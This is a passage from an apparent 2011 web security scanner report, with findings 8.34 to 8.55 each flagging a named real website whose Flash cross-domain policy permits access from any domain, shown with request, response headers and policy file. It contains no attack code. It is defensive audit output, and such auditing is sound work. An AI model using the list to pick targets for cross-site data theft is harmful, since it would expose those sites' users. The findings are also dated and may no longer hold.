<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

8.34. http://usjobsresource.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usjobsresource.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 17 Jan 2011 18:41:04 GMT
ETag: "fccc26-c6-49a0f204dd000"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.35. http://va.px.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

8.36. http://view.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: view.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Mon, 02 May 2011 02:20:11 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

8.37. http://www.4tubehd.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4tubehd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4tubehd.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:40 GMT
Server: Apache/2.2.16 (FreeBSD) DAV/2 PHP/5.3.5 with Suhosin-Patch
Last-Modified: Fri, 19 Sep 2008 14:11:03 GMT
ETag: "31198a6-64-4574045896bc0"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.38. http://www.aces.edu/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aces.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aces.edu

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 01 Apr 2007 15:41:00 GMT
ETag: "1438701-ca-ee70bb00"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.39. http://www.architecturaldigest.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.architecturaldigest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.architecturaldigest.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Mon, 02 May 2011 00:29:00 GMT
Date: Mon, 02 May 2011 00:19:00 GMT
Content-Length: 131
Connection: close
X-N: S


<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

8.40. http://www.babesandstars.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babesandstars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babesandstars.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:02 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 20:49:49 GMT
ETag: "5e403c1-8d-4a0fb2ec8f540"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

8.41. http://www.bakugandimensions.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bakugandimensions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bakugandimensions.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:23 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 01:30:36 GMT
ETag: "23102f-111-49d61be3e8700"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
   <allow-h
...[SNIP]...

8.42. http://www.banner.kiev.ua/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.banner.kiev.ua
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.banner.kiev.ua

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:16:20 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 203
Last-Modified: Fri, 28 Nov 2008 12:59:15 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.43. http://www.bigrebelgames.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigrebelgames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigrebelgames.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:58 GMT
Server: Apache
Last-Modified: Thu, 08 Apr 2010 15:07:04 GMT
ETag: "10a-4bbdf118"
Accept-Ranges: bytes
Content-Length: 266
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.44. http://www.bonhams.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bonhams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bonhams.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:31 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 15:57:30 GMT
ETag: "29fd-ca-4805ab93c6e80"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Content-Type: text/xml
Expires: Sun, 01 May 2011 23:31:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

8.45. http://www.cbs8.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs8.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbs8.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Mon, 02 May 2011 00:40:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:40:25 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

8.46. http://www.express.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.express.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.express.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:44 GMT
Server: Apache
Last-Modified: Mon, 27 Apr 2009 17:01:16 GMT
ETag: "641b0-1ff-4688c4b5def00"
Accept-Ranges: bytes
Content-Length: 511
MS-Author-Via: DAV
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.netro42.com" />
<allow-access-from domain="*.netro42.net" />
<allow-access-from domain="*.dailyexpress.co.uk" />
<allow-access-from domain="*.express.co.uk" />
<allow-access-from domain="*.scottishdailyexpress.co.uk" />
<allow-access-from domain="*express.co.uk" />
<allow-access-from domain="*" />
...[SNIP]...

8.47. http://www.foxytube.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxytube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxytube.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Fri, 04 Dec 2009 19:53:36 GMT
ETag: "2e008f1-92-479ec769bb000"
Accept-Ranges: bytes
Content-Length: 146
Connection: close
Content-Type: application/xml
Set-Cookie: RNLBSERVERID=ded691; path=/
Cache-control: private

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.48. http://www.freemooviesonline.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freemooviesonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freemooviesonline.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Last-Modified: Thu, 03 Jun 2010 12:56:46 GMT
ETag: "314040-cb-4881fbd2c3f80"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

8.49. http://www.fulltiltpoker.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulltiltpoker.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fulltiltpoker.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:44 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Thu, 20 Jan 2011 11:11:28 GMT
Accept-Ranges: bytes
Content-Length: 77
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

8.50. http://www.goodtoknow.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goodtoknow.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goodtoknow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Apr 2011 08:28:48 GMT
ETag: "1c90d62-71-4a0dcb6dc9000"
Accept-Ranges: bytes
Content-Length: 113
Content-Type: text/xml
Date: Mon, 02 May 2011 00:18:20 GMT
Connection: close
Set-Cookie: browsertype=web; expires=Tue, 03-May-2011 00:18:20 GMT; path=/; domain=.goodtoknow.co.uk

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


8.51. http://www.healthination.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthination.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthination.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:56:04 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 17 Feb 2009 16:22:47 GMT
Content-Length: 221
Cache-Control: max-age=4200
Expires: Mon, 02 May 2011 01:06:04 GMT
Accept-Ranges: bytes

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
<
...[SNIP]...

8.52. http://www.hyperlaunch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hyperlaunch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hyperlaunch.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:10 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Thu, 04 Dec 2008 13:37:45 GMT
ETag: "a70756-d8-aa62dc40"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross
...[SNIP]...

8.53. http://www.jacksonnewspapers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jacksonnewspapers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jacksonnewspapers.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:16:27 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.ghm.zope.net
X-Cache: MISS from cache5.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache5.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.54. http://www.journalstandard.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.journalstandard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.journalstandard.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:51 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
Age: 1173
X-Cache: HIT from parent3.ghm.zope.net
X-Cache: MISS from cache7.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache7.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.55. http://www.ksrevenue.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ksrevenue.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ksrevenue.org

Response

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/xml
Last-Modified: Fri, 04 Feb 2011 19:33:26 GMT
Accept-Ranges: bytes
ETag: "9b9ec65a2c4cb1:2206"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:21:5